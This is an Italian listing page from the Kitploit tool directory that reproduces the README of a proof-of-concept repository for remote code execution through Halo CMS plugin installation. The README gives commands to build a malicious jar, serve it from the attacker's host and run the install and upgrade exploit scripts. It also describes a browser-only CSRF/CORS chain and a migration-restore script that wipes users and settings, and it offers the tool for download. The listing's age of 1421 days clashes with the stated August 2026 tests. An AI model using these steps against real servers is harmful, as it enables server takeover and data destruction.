Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
halo-cve-2026-67919 — plugin halo cms RCE con 1 richiesta da un url, PoC + catena di exploit | Kitploit
Strumenti/GitHubGitHub/k0nnect/halo-cve-2026-67919
ExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingRed TeamingSviluppo Payload
GitHubk0nnect/halo-cve-2026-67919

halo-cve-2026-67919

plugin halo cms RCE con 1 richiesta da un url, PoC + catena di exploit

Vedi Repository
1421 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

halo plugin rce da un URL

La console di halo consente agli amministratori di installare e aggiornare plugin incollando un URL. Recupera qualsiasi URL, installa il jar e il codice del jar viene eseguito sul server. Nessun controllo sullo schema, nessun controllo sull'host, i redirect vengono seguiti, e il plugin manager carica le classi di estensione direttamente dal jar.

Si tratta di cve-2026-67919 (install-from-uri / upgrade-from-uri), cve-2026-67920 (migration restore), cve-2026-67921 (csrf/cors chain). Tutti e tre verificati contro halohub/halo:2.25.4 in un lab docker, agosto 2026. main è ancora senza patch.

La parte divertente: è anche una catena che richiede solo il browser. L'API della console non controlla il token xsrf, il cookie di sessione è samesite=none, e cors riflette qualsiasi origine con le credenziali. Una pagina visitata dall'admin può fare tutto con fetch(). Vedi exploit/csrf.html.

laboratorio

root@kitploit:~
docker run -d --name halo -p 8090:8090 halohub/halo:2.25.4
# visit /system/setup once, or script it (see notes/findings.md)

servi un jar dall'host (in ascolto su 0.0.0.0, il container raggiunge l'host come host.docker.internal):

root@kitploit:~
python3 -m http.server 8123

rce in due richieste

compila il plugin malevolo (richiede JDK 17):

root@kitploit:~
cd plugin && sh build.sh

poi:

root@kitploit:~
cd exploit && python3 -m pip install -r requirements.txt
./rce_install.py http://localhost:8090 admin 'Admin@12345' \
    http://host.docker.internal:8123/poc-plugin.jar

docker exec halo cat /tmp/pwned

rce in una richiesta

qualsiasi plugin già installato può essere sostituito in una singola richiesta; il jar deve solo avere lo stesso metadata.name e una versione superiore. poc-sitemap.jar è quella variante per il PluginSitemap integrato (1.x -> 2.0.0).

root@kitploit:~
./rce_upgrade.py http://localhost:8090 admin 'Admin@12345' \
    PluginSitemap http://host.docker.internal:8123/poc-sitemap.jar

docker exec halo cat /tmp/pwned

da un browser, nessun token necessario

apri exploit/csrf.html, puntalo al tuo halo, clicca. È la catena cve-2026-67921 -> cve-2026-67919: nessun header xsrf, il cookie di sessione va cross-site, cors permette la rilettura.

chi può farlo

solo l'admin, qualunque cosa dica la descrizione di CISA. l'anonimo riceve un 302, l'ospite un 403, l'admin ottiene esecuzione di codice. la catena csrf resta interessante perché l'admin è già autenticato quando la pagina viene eseguita.

ripristino migrazione (cve-2026-67920)

i ripristini recuperano un URL arbitrario (un altro primitivo di fetch), scrivono workdir/ dello zip nella directory di lavoro di halo senza sanificazione e sostituiscono l'intero archivio delle estensioni con il contenuto del backup. un extensions.data vuoto cancella utenti, role binding e impostazioni. usa exploit/migration_restore.py solo su una macchina usa e getta.

cosa c'è qui

root@kitploit:~
exploit/   login.py, rce_install.py, rce_upgrade.py,
           migration_restore.py, csrf.html
plugin/    plugin.yaml, Exploit.java, plugin-components.idx,
           build.sh, prebuilt jars
notes/     findings.md (privilege ladder, fetcher behavior,
           cookie/cors details, fix status)

per la variante a 1 richiesta, modifica plugin/plugin.yaml (metadata.name + version) e ricompila; oppure usa il poc-sitemap.jar precompilato su un halo che ha PluginSitemap installato.

disclaimer: solo per ricerca su sistemi di tua proprietà. in particolare quello di migrazione distruggerà l'istanza su cui viene eseguito.

crediti

chris jagdeo (k0nnect)

Scarica lo strumento